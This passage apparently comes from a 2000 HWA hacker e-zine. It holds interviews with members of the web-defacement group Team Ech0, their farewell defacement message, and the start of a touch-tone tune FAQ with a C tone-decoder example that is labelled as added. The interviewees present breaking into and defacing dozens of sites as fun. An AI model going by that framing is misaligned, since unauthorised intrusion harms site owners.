      <FR>    mostly bbs's and shit at that time tho ya
      
      <HWA>   yeah same here, ran a board for 18yrs if u can believe it
      
      <FR>    and qwikmail etc...
      
      <HWA>   yeap
      
      <FR>    damn that's a long ass time
      
      <HWA>   yeah
      
      <FR>    r u in the states?
      
      <HWA>   irc only came into existence around 89 ppl don't realize that... 
              no, Canada.
      
      <FR>    that's cool, what kinds of articles does hwa do and shit, etc..?
      
      <HWA>   well we're doing the same shit HNN covers, looking for original 
              stuff when we can anything security/hack related and general tech
              and the exploitation of same
              
      <FR>    if u guys ever need any security/hacking/cracking, etc... articles
              or how-to's, or whatever... let me know i'd be more than willing to
              submit shit
              
      <HWA>   always, if u feel like writing just dive in and fire me the stuff 
              off
      
      <FR>    and i don't know everything.. but.. whatever i don't know, i'll 
              exploit it, just so i'd know it then.. ;)
              
      <HWA>   yeah! heh.
      
      <FR>    do u guys have a lot of readers?
      
      <HWA>   its hard to track, the mailing list that basically announces the 
              new issues has just shy of 500 members, then we have mirror sites
              all over the place including highprofile places like attrition and
              packetstorm among others so I don't really know. Considering I was
              doing it for my own enjoyment, the fact other ppl dig it too is an
              added bonus....I just wanted to have as much info as possible kept
              in one place.
              
      <FR>    well..i gotta go a for little while..talk atcha later.
      
      <HWA>   ok dude,  catchya later
      
      <FR>    take it easy
      
      <HWA>   you too.bye ..
      
      <END TRANSCRIPT>    
      
      (* To be continued in later issues if possible. -Ed )
            
      
      @HWA
     
26.0 Exclusive: Interview with Team Ech0 (pre-bust and after bust)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Interview by SugarKing <un edited>
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
     
      Session Start: Sat Feb 19 22:31:42 2000
      Session Ident: team-ech0 (?????????@PPP???????????????.com)
      <team-ech0> Hi. I'm from a rep. from Team Echo.
      <SugarKing> hey
      <team-ech0> hey there.
      <SugarKing> first of all......you don't have to answer a question if you 
                  don't want to..
      <team-ech0> ok.
      <SugarKing> ok i'll start logging now then
      <team-ech0> aight.
      <SugarKing> how old are you and how long have you been hacking/computing?
      <team-ech0> Are you asking about me personally or the group?
      <SugarKing> doesn't matter....you i guess since i'm only interviewing you
      <SugarKing> :)
      <team-ech0> The group has members ranging from the teens to about the mid
                  twenties. We've all been computing since about 6.
      <team-ech0> I'll answer about the group.
      <SugarKing> how did you get into hacking?
      <team-ech0> I think that as time progresses and people learn more about 
                  computers it sort of comes naturally, at least if you are 
                  genuinely interested. It's natural to sort of "push the limits".
      <SugarKing> yeah
      <SugarKing> have you or any other members been in any other groups in the 
                  past?
      <team-ech0> I can't answer that because that'd imply who our members are 
                  :)
      <SugarKing> that kills my next question......how about how many members are 
                  there?
      <team-ech0> The whole idea is that the group tries to be anonymous, it's a
                  group, not a bunch of individuals
      <team-ech0> But I will answer that.
      <team-ech0> There are 6 members.
      <SugarKing> ok
      <SugarKing> you guys are from different countries telling from your website?
      <team-ech0> Which website are you referring to?
      <SugarKing> ech0.zort.org
      <team-ech0> hate to tell ya, but that's not ours.
      <team-ech0> hahaha
      <SugarKing> no? who's is it?
      <team-ech0> ech0 security != Team Echo
      <team-ech0> but check out this shitz0r: www.luresa.com
      <SugarKing> oh...sorry about htat:)
      <team-ech0> heh
      <SugarKing> those are all the sites you guys have defaced?
      <team-ech0> up to 2.13.00, since then I'd guess there have been around 20 
                  more
      <SugarKing> what is your reason for defacing?
      <team-ech0> mostly people say because "i wanna contribute to security, 
                  blah blah" but that's really an overused and groundless excuse.
      <team-ech0> I think the real reason is that we can.
      <team-ech0> It challenges us, it's something to do. Some of the defacements
                  even have a "message".
      <SugarKing> yeah...i've seen alot of your defacements.....some say you defaced
                  cause you were bored?
      <team-ech0> yeah.
      <team-ech0> that's correct.
      <SugarKing> do you use your own exploits or other people's?
      <team-ech0> a combination of the two.  Our group has coded many exploits 
                  though.
      <SugarKing> is team-ech0 affiliated with any other groups? any rivals or 
                  anything? I've seen a few flames at the 'Crime Boys'
      <team-ech0> yeah, just them.
      <team-ech0> we hate the 'Crime boys'
      <SugarKing> heh
      <team-ech0> but aside from that, we love everyone else
      <team-ech0> ;)
      <SugarKing> are you guys afraid of being raided?
      <team-ech0> it's definitely a possibility but I think that since we've done
                  mostly low-profile sites it's sort of out of the question.
      <SugarKing> so you guys don't do any gov or mil sites?
      <SugarKing> or just choose not to?
      <team-ech0> we avoid those. that's what'll get ya busted.
      <SugarKing> yeah i know...heh
      <team-ech0> you hear how fuqrag got raided?
      <SugarKing> no...when was this?
      <team-ech0> like 2 days ago
      <SugarKing> wow
      <team-ech0> got raided by the FBI, secret service and Interpol...ouch
      <SugarKing> HWA just did an interview with his last issue too
      <team-ech0> he's been indicted on 138 charges in the U.S. and a whole slew
                  internationally
      <SugarKing> him rather
      <SugarKing> jesus
      <team-ech0> i know
      <team-ech0> where can I read that interview?
      <SugarKing> http://welcome.to/HWA.hax0r.news
      <SugarKing> issue 49
      <team-ech0> ok.
      <SugarKing> you'll most likely be in issue 51
      <team-ech0> cool cool
      <SugarKing> what do you think about the whole DOS issue with Yahoo! and all
                  those other sites?
      <team-ech0> don't really care much about it...i'd love to see some of the
                  "mafiaboy" IRC logs tho 
      <SugarKing> so would I
      <team-ech0> heh
      <SugarKing> i have to ask this....but who does all your artwork? especially
                  the one with the purple sky.....gotta love that one
      <team-ech0> heh, various people send in art. you see the one with the X-files 
                  background?
      <team-ech0> it == leet
      <SugarKing> yeah I just saw that one about an hour ago
      <SugarKing> i like that one 
      <team-ech0> yea
      <SugarKing> this is my last question......don't wanna keep ya too long......
                  what plans does Team Ech0 have for the future? how long do plan 
                  on staying together, etc?
      <team-ech0> i'll just say that we will never die.
      <SugarKing> that just about sums it up:)
      <team-ech0> alright.
      <SugarKing> well thanks again for the interview
      <SugarKing> i didn't think you were going to even read my mail
      <SugarKing> nevermind actually accept the interview
      <SugarKing> have any greetz, plugs?
      <team-ech0> no problemo.
      <team-ech0> see ya.
      Session Close: Sat Feb 19 23:06:01 2000
     
     
     The farewell message on Team Ech0's final defacement:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.attrition.org/mirror/attrition/2000/02/25/www.citirealty.com/
     
     
     Ladies and Gentlemen, fans, antagonists, and whoever else. 
     I have some disturbing news.  By this weekend, Team Echo will be no more.
     It is rumored that one of our members known by Analognet has been busted
     by the Feds, and turned in by another of our kind,
     
     I can absolutely assure you that it wasn't one of us.  We were a family, 
     but now things have changed and we are heading our own separate ways.  
     We have had some memorable moments, and they will always be archived on
     Attrition.org (hopefully).  For those of you who still do not know who 
     was in Team Echo, you're about to find out.  First there was me, I am the
     one the only Sys-Edit, then there was Political Genocide, The Unknown 
     Soldier, Bansh33, BusDr1v3r and last but not least Analognet.

     I hope we have given you some good laughs along the way, along with our
     expressive political opinions.  Due to what has been rumored to transpire,
     we are no longer a team.  We are disbanding very soon.  Most of us will 
     just disappear into the night from which we came, others will go on to 
     big and better things, but just remember us sometime down the line.  

     First I would like to thank Phyre for some of our new art, and to the person
     who said the landscaped picture sux, FUCK YOU!!!!!!!!!!!!!!!  I made that you
     2 bit whore.

     I want to thank everyone who emailed us, fan and hatemail alike.   We recently
     received an email from some female in quebec, i am sorry that i didn't get to 
     reply to your email, but if you want mail me at Sys-Edit@excite.com english if
     you could, my french is horrible
                                                                                :o)

     Shouts: Zenomorph, Bansh33,Sh00tR,Analognet.......if you're still out there., 
     Artech, Angel, Political Genocide, Digital Domination and everyone else who's
     been there in the past few months since our defacing began.

     "he was a good man he was a loving man. ehhh fuck it. peace bro" 
                                                           - Political Genocide

     "Fuck you Centauri and Fuck Spinux.net"- Bansh33

      Hey bastards get me out of here!!! - Analognet (this i can only assume)

      Fear not for us, we will survive, I believe that we will all be reborn some 
      time in the future.  Remember Team Echo loves you!! - Sys-Edit

      We bid ye farewell...............

                                                                                                   
      Contact: sys-edit@excite.com
      
      
      The 'after bust' interview by SugarKing,
      
      
      For those of you who don't know, Team Ech0 officially split up on Feb. 24,
      only 5 days after I did the interview with them. It had been rumored that
      one member who goes by the handle "Analognet" had been busted by the feds.
      Team Ech0 then decided to go their separate ways. This interview was done on
      Feb. 27 with ech0 member "Sys-Edit". Some of it has been edited for obvious
      reasons.
      
      
      SugarKing: hey
      phtmphr34k: yo
      phtmphr34k: how you doing?
      SugarKing: good
      SugarKing: you?
      phtmphr34k: ok, dont feel like going to work tomorrow tho :)
      SugarKing: heh
      SugarKing: i don't feel like going to school
      SugarKing: just got off vacation....this week is going to suck
      phtmphr34k: trade?
      SugarKing: sure if I get paid:)
      phtmphr34k: you go do my admin job and ill go to school for you
      SugarKing: ahh your an admin?
      SugarKing: cool
      phtmphr34k: yeah not a head admin, yet
      phtmphr34k: wtf brb damn peope at my door
      SugarKing: oh
      SugarKing: ok
      phtmphr34k: ok man i hate door to door religious people
      SugarKing: haha me too
      phtmphr34k: whered i put my shot gun ;)
      SugarKing: so anyways....i'm guessing the rep I interviewed the first time
      was Bansh33?
      phtmphr34k: yeah
      phtmphr34k: i think might of been political genocide but im pretty sure it
      was bansh33
      SugarKing: so how did you guys hear that "Analognet" got busted?
      SugarKing: i'm pretty sure it was bansh33 from his ident
      phtmphr34k: well were not totally sure its only rumored
      SugarKing: so is that what made you guys decide to split?
      phtmphr34k: well thats part of the reason
      phtmphr34k: we made team echo to remain anonymous
      SugarKing: yeah and now everyone knows who is who:)
      phtmphr34k: too many people whine about this and that and we didn't want to
      hear it
      phtmphr34k: yeah
      SugarKing: it is kind of weird since you guys only did low-profile sites
      phtmphr34k: yeah well we do it for fun
      phtmphr34k: and an occasional political message
      SugarKing: yeah
      phtmphr34k: we had fun doing it
      phtmphr34k: and that was our main point
      SugarKing: what do you plan on doing now?
      phtmphr34k: well for right now im just gonna stay low for a little bit
      phtmphr34k: nothing really extravagent
      SugarKing: what about for the future....think you'll ever join another
      group?
      phtmphr34k: polit gen and bansh33 were thinking of starting another group,
      but for right now, im just gonna concentrate on work and securing that
      network
      SugarKing: yeah that's cool
      phtmphr34k: it depends really, if i do, ill change my handle and start anew,
      sys-edit is just my most recent handle
      SugarKing: that nick sounds familiar....did you have it before team ech0?
      phtmphr34k: yes, fightcrime.org was the last time i used it 12/31/99
      SugarKing: it's kind of coincidence since fuqrag got raided after HWA
      interviewed him
      SugarKing: now this....
      SugarKing: w'er bad luck..haha
      phtmphr34k: hey stop putting them paranoid thoughts in my head lol
      SugarKing: we're rather
      SugarKing: lol
      SugarKing: why did you guys choose to remain anonymous and why now did you
      come public with your handles?
      phtmphr34k: well some other people like to bitch and  moan about things and
      this and that, flame wars etc..., we're not really into that, though i will
      admint i did say something to the crime boys for their lack of ability.  As
      for coming out with our handles now, pretty much most on irc knew who we
      were so i figured what the hell everyone knows who we are anyway
      SugarKing: yeah
      SugarKing: you guys hang on EFnet? Undernet?
      phtmphr34k: you might be able to find bansh33 or polit genocide on their,
      but i left irc when we started t-e.  i liked being anonymous
      SugarKing: i'm always on efnet.....i hate AIM or ICQ
      SugarKing: the only reason i have AIM is because of my personal friends etc.
      SugarKing: most don't know WHAT IRC is.....hehe
      phtmphr34k: yeah same here, and icq
      phtmphr34k: right now im just working on gettinga new system and a dsl :x
      SugarKing: i wish i could get dsl
      SugarKing: i'm only on dialup
      SugarKing: it sucks
      phtmphr34k: cable modem is almost as good
      SugarKing: cable isn't as reliable though
      phtmphr34k: I would get that but, my cable company has no clue what that is
      phtmphr34k: true
      phtmphr34k: so im still on dial up also
      SugarKing: yeah dialup sucks...but it's all I can afford right now....unless
      we do trade school/work hehe
      phtmphr34k: i know what you mean
      phtmphr34k: i proxy through some univerisities around here once in a while
      hee hee
      SugarKing: heh
      SugarKing: i was a bit surprised to see that you guys were splitting
      SugarKing: cause i look at mostly all of your defacements
      phtmphr34k: i think everyone was
      phtmphr34k: we've gotten alot of mail about us
      SugarKing: i thought you guys were gonna around for awhile
      SugarKing: do you consider team ech0 as a come/go group?
      phtmphr34k: i was hoping to be but some people can't leave well enough
      alone, i won't mention names
      phtmphr34k: well if we could of remain anonymous, we would of been around
      for a long time
      SugarKing: ahh damn....brb.....gonna eat real quick:)
      phtmphr34k: ok ill be here
      SugarKing: ok.......back........gotta love turkey:)
      phtmphr34k: lol sour cream n onion chips with ice tea
      SugarKing: BBQ is better:)
      SugarKing: i use to love sour cream n onion chips but i got sick of them
      phtmphr34k: actually macaroni and cheese is the best, i just dont have any,
      ""note to self, tell mother to go to the store and buy some since im too
      lazy""
      SugarKing: hehe
      SugarKing: im a real lazy kid.....but oh well
      phtmphr34k: me too
      phtmphr34k: but i dont care either
      SugarKing: so how old are you exactly? from the how old interview it said
      members were from teens to mid-twenties? I'm guessing 22ish
      phtmphr34k: 20ish in may
      SugarKing: may what? my birthday is may 17th
      phtmphr34k: 29th
      phtmphr34k: memorial day this yr
      SugarKing: ahh
      SugarKing: may is a cool month
      phtmphr34k: yeah
      phtmphr34k: i told my mother to buy me some jd and smirnoff
      SugarKing: heh
      SugarKing: i just had a rough weekend myself
      SugarKing: underage drinking....gotta love it...lol
      phtmphr34k: yeah
      phtmphr34k: thing is, i dont get drunk
      SugarKing: neither do I.....i just get buzzed
      phtmphr34k: i can drink unlimited amounts of liquor and wont get drunk
      phtmphr34k: i dotn even get that
      SugarKing: that's a cool talent
      SugarKing: heh
      phtmphr34k: yeah, i just dont drink beer
      SugarKing: that's what I drink
      SugarKing: cause if I drink hard stuff i'll pass out in 5 minutes
      phtmphr34k: vodka or jd for me
      phtmphr34k: eat before you drink
      SugarKing: i do some occassional mixed drinks.....usually screwdrivers
      phtmphr34k: thats the shit
      SugarKing: that's what I do.....order a big sub or something
      phtmphr34k: on new years i drank half a bottle of jim beaam
      SugarKing: cool
      phtmphr34k: yeah, but i wont drink jim beam again
      SugarKing: the only really hard stuff i'll drink is vodka, jd, or some
      captain morgan's
      phtmphr34k: boston huh?
      SugarKing: yup
      phtmphr34k: i know a few people out that way
      phtmphr34k: do you hit the 2600 mtgs out there?
      SugarKing: yes, once
      SugarKing: and it was stupid
      SugarKing: i actually live 45 minutes from boston
      phtmphr34k: i got friends by the cape
      SugarKing: i live on the mass/new hampshire border
      phtmphr34k: alright
      SugarKing: oops
      SugarKing: ignore that:)
      SugarKing: mouse is acting up
      phtmphr34k: tell me, do you tech support for your friends too?
      phtmphr34k: no prob
      phtmphr34k: didnt kno wyou had beta
      phtmphr34k: would of suggested it
      SugarKing: well right now i'm not even able to get a job.....not 16 yet:)
      SugarKing: but when i turn 16 i am going to work for tech support at a local
      ISP
      phtmphr34k: cool
      phtmphr34k: man, i dont remember 13-17
      SugarKing: i'm turning 15 in may
      phtmphr34k: well except for computers and hockey
      phtmphr34k: cool
      phtmphr34k: hey you know about scsi cards?
      SugarKing: yeah not a whole lot though
      phtmphr34k: i just "borrowed" a card from work but adaptec doesn't have the
      proper software on their site, i need to change hte irq from 13(math co
      processor ) to my open of 9
      phtmphr34k: ima bout to kill em
      SugarKing: wouldn't know how heh
      phtmphr34k: dam
      phtmphr34k: guess i gotta play with the dipswitches
      SugarKing: anyways.....back to the reason I IM'd you the first
      place......this interview is probably the longest in history......heh
      phtmphr34k: lol probably
      SugarKing: how did you guys contact each other?
      SugarKing: if you never used IRC that is
      phtmphr34k: i knew analog net for about 3 years, way back on an isp
      phtmphr34k: and we've done some stuff in the past (also on attrition)
      phtmphr34k: and i was talking to him on aim and he said we should form a
      group and become anon, so I was like alright
      SugarKing: where did you guys meet the other members?
      phtmphr34k: i met political genocide on irc, also bansh33, but analognet was
      the one who brought them in
      phtmphr34k: and our anonymous member who likes political issues, I went to
      highschool with him
      SugarKing: that's cool
      SugarKing: i only know a few kids in my high school that know some stuff
      about computers
      SugarKing: other than that they are AOL kiddies
      phtmphr34k: well at the time he was a major dick
      phtmphr34k: but the marines changed that
      SugarKing: ahh
      SugarKing: according to the first interview bansh said that all members were
      on computers since age 6??
      phtmphr34k: that sounds about right to me
      SugarKing: i've only been on computers since i was maybe 9
      phtmphr34k: i built my first one at 8, old ibm dos 286  2 ram 50meg hd
      SugarKing: back on a commodore 64
      SugarKing: wow that's pretty amazing
      phtmphr34k: atari 2600 :)
      SugarKing: heh
      phtmphr34k: actually i had pong built into a tv
      SugarKing: cool
      SugarKing: what languages do you could in?
      SugarKing: code*
      SugarKing: could..hehe
      phtmphr34k: well I was doing C for a while
      phtmphr34k: slowly going over to c++
      phtmphr34k: used to do basic and assembly
      phtmphr34k: working on vb, and java
      phtmphr34k: just dont have as much time as i used to with my job
      SugarKing: i have vb software but i don't think i'll learn it since it
      really is useless
      SugarKing: since it's not portable at all
      phtmphr34k: very true
      phtmphr34k: but id like it for my own knowledge
      SugarKing: yeah
      SugarKing: i am focusing on perl
      phtmphr34k: yeah ill get around to that eventually
      SugarKing: then i'm probably going to learn C
      phtmphr34k: c is boring
      phtmphr34k: ZZZZZZZZZzzz
      SugarKing: heh
      phtmphr34k: c++ is just mainly shortcuts
      SugarKing: i actually bought a C++ book before I even knew anything about C
      SugarKing: which was sort of a bad idea
      SugarKing: I know some c++
      phtmphr34k: yeah i know what ya mean
      SugarKing: btw hopefully you saved that art you guys used for
      defacements....was really cool
      SugarKing: especially the X-files on...I saved that one on my hd....put it
      on a disk too
      SugarKing: heh
      phtmphr34k: yeah, i did the first one with the terrain @ nite
      phtmphr34k: and i did the one on the very last hack
      phtmphr34k: and a guy named Phyre did most of the rest
      SugarKing: yeah that one is cool too
      phtmphr34k: there was another but they never left their handle
      SugarKing: what did you use to make it?
      phtmphr34k: bryce 3d and photoshop 5.5 on the first and photoshop on the 2nd
      one
      phtmphr34k: ill be designing a few for my current handle and a few for my
      new handle
      SugarKing: i have photoshop 4.0 on CD but I don't have it installed....it's
      old...
      SugarKing: i use paint shop pro
      SugarKing: i don't really like it though
      phtmphr34k: i got 5.5 on cd
      phtmphr34k: install 4.0 and get plugins
      SugarKing: yeah true
      phtmphr34k: i have about 60 megs in plugins
      SugarKing: hehe
      SugarKing: how big is your hd?
      phtmphr34k: if you have an ftp server or space somewhere if i get some time
      ill upload some to youu
      phtmphr34k: 7.3 gigs 2 hdd
      phtmphr34k: till i get the $$ for my new comp
      SugarKing: what os's do you run?
      SugarKing: i see your on windows now
      phtmphr34k: windows on this box
      phtmphr34k: and im trying to get my friends old box to put linux back on
      SugarKing: ahh
      SugarKing: i'm dual booting 98 and redhat
      phtmphr34k: my other linux box died
      SugarKing: heh
      phtmphr34k: i have caldera i have to install yet
      phtmphr34k: once i get my new computer i will own the world :x
      SugarKing: hehe
      phtmphr34k: 800mhz, 256 ram, 2 40 gig hd's
      phtmphr34k: burner
      phtmphr34k: 3d card
      SugarKing: sweet
      phtmphr34k: nic,56k dial up
      SugarKing: my system sucks
      phtmphr34k: dual boot win2k and red hat
      phtmphr34k: wanna talk about sux
      SugarKing: i'm gonna put all new shit in it though
      SugarKing: when i get money
      SugarKing: heh
      phtmphr34k: p1 200, 64 ram, 2 hds (503 meg after i fucked up) and a 6.8,
      33.6 modem, have a 56k but cant use it
      phtmphr34k: my sound card rox tho 64 biy
      phtmphr34k: bit*
      SugarKing: cool
      phtmphr34k: yeh
      phtmphr34k: ill need it for all my pirated software
      phtmphr34k: + what im pirating tomorrow from work
      SugarKing: i cant pirate since i'm on dialup unless i wanna sit here and
      download a big program for a few days
      phtmphr34k: i used to do that
      phtmphr34k: now i do it from work and burn it
      SugarKing: that's what I need too.......a burner
      phtmphr34k: oh i also want to mention about our email
      phtmphr34k: now some people might think us media wh0res because of the email
      addy we left, but thats not the case, we left it if the admin wanted to
      contact us, and some fan/hate mail doesn't hurt either :-)
      phtmphr34k: yeah their nice, need one at home :)
      SugarKing: yeah most groups don't leave an e-mail
      SugarKing: it worked out though since i contacted you guys for an interview
      phtmphr34k: yeah
      SugarKing: i've been contacting alot of people lately for interviews
      SugarKing: even the crime boys
      phtmphr34k: heh
      phtmphr34k: no talent hacks
      SugarKing: but i don't think they'll accept since they can't even speak
      english
      SugarKing: heh
      phtmphr34k: i think ive only seen about 2 or 3 original sites done by them,
      most are rehacks
      SugarKing: eh?
      SugarKing: i've never noticed
      phtmphr34k: yeah
      phtmphr34k: thats why attrition has #2 #3
      SugarKing: you guys did a pretty good number of defacements
      phtmphr34k: weve done that once or twice but didnt know
      SugarKing: little over 50
      phtmphr34k: actually 64 i believe
      SugarKing: ahh
      phtmphr34k: i did one way back that didn't get archieve
      SugarKing: did you guys ever deface a particular server or just random?
      phtmphr34k: the american dental association
      phtmphr34k: random
      SugarKing: heh
      phtmphr34k: i save all the ones i do on my drive just for personal records
      SugarKing: do you consider yourself a script kiddie or a true hacker?
      phtmphr34k: in my opinion im a true hacker, though some but not all the
      methods i use are that of a script kiddie
      phtmphr34k: i dont go braggin about what network ive compromised
      phtmphr34k: id like to stay out of jail
      SugarKing: heh
      SugarKing: yeah
      phtmphr34k: so on my defacements people could call me a script kiddie, but i
      don't care about their opinions
      phtmphr34k: i deface cuz its fun, its a hobby and it relieves stress
      SugarKing: do you feel that your contributing to security while doing it?
      phtmphr34k: yeah, i always close the holes up i enter through
      phtmphr34k: half the time i leave the admin a note letting them know their
      problem
      SugarKing: has an admin ever contacted you back?
      phtmphr34k: yes
      SugarKing: that's cool
      phtmphr34k: i believe it was one from weatherford.com
      SugarKing: oh
      phtmphr34k: he said something along the lines of : thanks for the hack, now
      I can tell our firewall admin that we need better security
      SugarKing: that's good
      SugarKing: which is true
      phtmphr34k: i use a firewall and im only on a dial up service
      SugarKing: i use a cheap one e.g. nukenabber etc.
      phtmphr34k: i use black ice
      SugarKing: just to log those packet kiddies that think it's fun on IRC
      phtmphr34k: yeah, i get the occasional netbus scan, subseven, etc.
      SugarKing: so do you think team ech0 will ever come back? possibly under a
      new name etc.?
      SugarKing: yeah
      SugarKing: lamers
      phtmphr34k: hard to say, i can tell you he members will resurface
      phtmphr34k: most defintely under new names
      SugarKing: what about you? you think you'll resurface?
      phtmphr34k: defintely, i think ill be doing a site tonite
      phtmphr34k: but i need a jpg/gif first
      SugarKing: nice
      SugarKing: ahh yeah
      phtmphr34k: but we were talking about forming another group, just im not
      ready for that yet, i like my handle right now
      phtmphr34k: I am just hoping that analognet is alright, I hope hes not some
      bodys bitch
      SugarKing: why didn't you guys just continue but under a new name?
      SugarKing: haha
      phtmphr34k: we figure well let things die down a little bit for now
      phtmphr34k: you may see us again by summers end
      SugarKing: cool
      SugarKing: well thanks for the interview and good luck..
      phtmphr34k: np...see ya

      
      @HWA


27.0  Phreaking good fun with DTMF and other goodies.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://twpyhr.usuck.com/
      Maintainer: Jennifer Martino
      
      Archive-Name:      The Unofficial Touch Tone Tune FAQ
      Last-Modified:     1999/12/29
      Version:           1.0
      Maintainer:        Jennifer Martino <jennmartino@my-deja.com>
      URL:               http://members.xoom.com/twpyhr0/tttfaq.html
           
      Compiled for:      The Web Page You Have Reached 
                         http://members.xoom.com/twpyhr0/
      
      
      
                                                         ___________
              The Unofficial Touch Tone Tune FAQ        /  _     _  \
                   (Well.. not really...)              |__[ L___I ]__|
                                                         |         |
                   ,@@@,            ,@@@@@,              |   :::   |
                ,@@"   "@@@,     ,@@"     "@@@,    ,@@@@"|   :::   |
          "@@@@@"          "@@@@@"            "@@@@"     '========='
                        original ascii art by joan stark
                      slightly modified by jennifer martino
      
      
      ______________________________________________________________________
                                                         
      1. What are touch tones?
      
         (From the TELECOM Digest FAQ
         http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
         The touch tone system uses pairs of tones to represent the various
         keys. There is a "low tone" and a "high tone" associated with each
         button (0 through 9, plus * (star) and # (the thing that's called
         various names: octothorp(e), hash, number sign, "pound" symbol)). The
         low tones vary according to what horizontal row the tone button is
         in, while the high tones correspond to the vertical column of the
         tone button.
      
      
      2. Which frequencies are used for the tones?
      
         (From the TELECOM Digest FAQ
          http://hyperarchive.lcs.mit.edu/telecom-archives/)
      
         The tones and assignments are as follows:
      
                1     2     3     A  :  697 Hz
      
                4     5     6     B  :  770 Hz
                                                 (low tones)
                7     8     9     C  :  852 Hz
      
                *     0     #     D  :  941 Hz
              ----  ----  ----  ----
              1209  1336  1477  1633 Hz
                     (high tones)
      
         When the 4 button is pressed, the 770 Hz and 1209 Hz tones are sent
         together. The telephone central office will then decode the number
         from this pair of tones.
      
         The tone frequencies were designed to avoid harmonics and other
         problems that could arise when two tones are sent and received.
         Accurate transmission from the phone and accurate decoding on the
         telephone company end are important. They may sound rather musical
         when dialed (and representations of many popular tunes are 
         possible), but they are not intended to be so.
      
         The tones should all be +/- 1.5% of the specified frequency. The
         high frequency tone should be at least as loud, and preferably
         louder than the low frequency. It may be as much as 4 dB louder.
         This factor is referred to as "twist."  If a Touchtone signal has
         +3 dB of twist, then the high frequency is 3 dB louder than the low 
         frequency. Negative twist occurs when the low frequency is louder.
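
         The tone-pair decoding and the twist rule described above, as an
         added C example that is not part of the FAQ: a Goertzel-filter
         detector run over a generated key press. The 8000 Hz sample rate,
         205-sample block, power floor and all function names are
         assumptions; the +/- 1.5% frequency tolerance is not checked.

```c
#include <stdio.h>

#define PI        3.14159265358979323846
#define FS        8000.0  /* sample rate in Hz (assumption) */
#define NSAMP     205     /* samples per analysis block (assumption) */
#define MIN_POWER 100.0   /* a bin below this counts as empty (assumption) */
#define MAX_TWIST 2.512   /* 4 dB as a power ratio: 10^(4/10) */

/* Frequencies and key layout from the FAQ table. */
static const double LOW_HZ[4]  = { 697, 770, 852, 941 };      /* rows    */
static const double HIGH_HZ[4] = { 1209, 1336, 1477, 1633 };  /* columns */
static const char KEYS[4][5]   = { "123A", "456B", "789C", "*0#D" };

/* sin(x) by Taylor series after folding x into [-PI, PI] (no libm needed). */
static double sin_approx(double x)
{
    double term, sum;
    int k;
    while (x > PI)  x -= 2 * PI;
    while (x < -PI) x += 2 * PI;
    term = sum = x;
    for (k = 1; k <= 12; k++) {
        term *= -x * x / ((2 * k) * (2 * k + 1));
        sum += term;
    }
    return sum;
}

/* Fill buf with the sum of a low and a high tone at the given amplitudes. */
static void make_tones(double *buf, double f_low, double a_low,
                       double f_high, double a_high)
{
    int n;
    for (n = 0; n < NSAMP; n++) {
        double t = 2 * PI * n / FS;
        buf[n] = a_low * sin_approx(f_low * t) + a_high * sin_approx(f_high * t);
    }
}

/* Goertzel filter: signal power in buf at one frequency. */
static double tone_power(const double *buf, double freq)
{
    double coeff = 2.0 * sin_approx(2 * PI * freq / FS + PI / 2); /* 2*cos(w) */
    double s1 = 0.0, s2 = 0.0;
    int n;
    for (n = 0; n < NSAMP; n++) {
        double s0 = buf[n] + coeff * s1 - s2;
        s2 = s1;
        s1 = s0;
    }
    return s1 * s1 + s2 * s2 - coeff * s1 * s2;
}

/* Decode one block: returns the key, or 0 if the block is rejected. */
static char dtmf_decode(const double *buf)
{
    double p_low[4], p_high[4], twist;
    int i, row = 0, col = 0;
    for (i = 0; i < 4; i++) {
        p_low[i]  = tone_power(buf, LOW_HZ[i]);
        p_high[i] = tone_power(buf, HIGH_HZ[i]);
        if (p_low[i]  > p_low[row])  row = i;
        if (p_high[i] > p_high[col]) col = i;
    }
    /* Both a row tone and a column tone must be present. */
    if (p_low[row] < MIN_POWER || p_high[col] < MIN_POWER)
        return 0;
    /* Twist rule as the FAQ states it: the high tone is at least as loud
       as the low tone, and at most 4 dB louder. */
    twist = p_high[col] / p_low[row];
    if (twist < 1.0 || twist > MAX_TWIST)
        return 0;
    return KEYS[row][col];
}

/* Generate a constructed key press and decode it. */
static char dtmf_key_for(double f_low, double a_low,
                         double f_high, double a_high)
{
    double buf[NSAMP];
    make_tones(buf, f_low, a_low, f_high, a_high);
    return dtmf_decode(buf);
}

int main(void)
{
    printf("770+1209 Hz, +1.9 dB twist: %c\n",
           dtmf_key_for(770, 0.4, 1209, 0.5));
    printf("770+1209 Hz, +6 dB twist:   %s\n",
           dtmf_key_for(770, 0.25, 1209, 0.5) ? "accepted" : "rejected");
    printf("770+1209 Hz, -1.9 dB twist: %s\n",
           dtmf_key_for(770, 0.5, 1209, 0.4) ? "accepted" : "rejected");
    return 0;
}
```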
      
      
      3. What are touch tone tunes?
      
         Touch tone tunes are songs played in touch tones.
      
      
      4. What's the point?
      
         Amusement. Annoyance.
      
      
      5. Where did you find them?
      
         Most are from "The Canonical List of Touch-Tone Phone Songs" which
         was maintained by Keith Maddock, some are from "The Push Button
         Telephone Song Text File" by The Craze, some are from an article
         by the United Phone Losers (http://www.phonelosers.net), some are
         from Steve Prior's website 
         (http://users.javanet.com/~sprior/) and a few were 
         submitted to me for my web page.
      
      
      6. Can I download sound files of touch tone tunes?
      
         The files with a <= after the title are available for download at
         http://members.xoom.com/twpyhr0/files9.html.
      
      
      7. How do you read the entries?
      
         Be sure you are viewing this FAQ with a fixed-width font (such as
         Courier New); otherwise the text will not line up correctly.
      
         Here is an example of an entry. My comments, which follow what I am
         explaining, are in brackets.
      
      (1) [number of the entry] Happy Birthday [Title] <= [There is a sound
                                                          file available to
                                                          download at
                                 http://members.xoom.com/twpyhr0/files9.html]
      Credits: Steve Prior (http://users.javanet.com/~sprior/)
               [credit and url for the first entry, the first line of numbers
                above each line of the song]
               The Craze [credit for the second entry, the second line of
                          numbers above each line of the song]
               Tina R. Jones / Keith Maddock [credit for the third entry, the
                                              third line of numbers above 
                                              each line of the song]
      
      1   1     2    1   6    3 [Numbers to press for the notes. First
                                 version of the first line for this song. 
                                 Steve Prior is given credit for this line.]
      4   4     2    4   #    8 [Numbers to press for the notes. Second
                                 version of the first line for this song. The
                                 Craze is given credit for this line.]
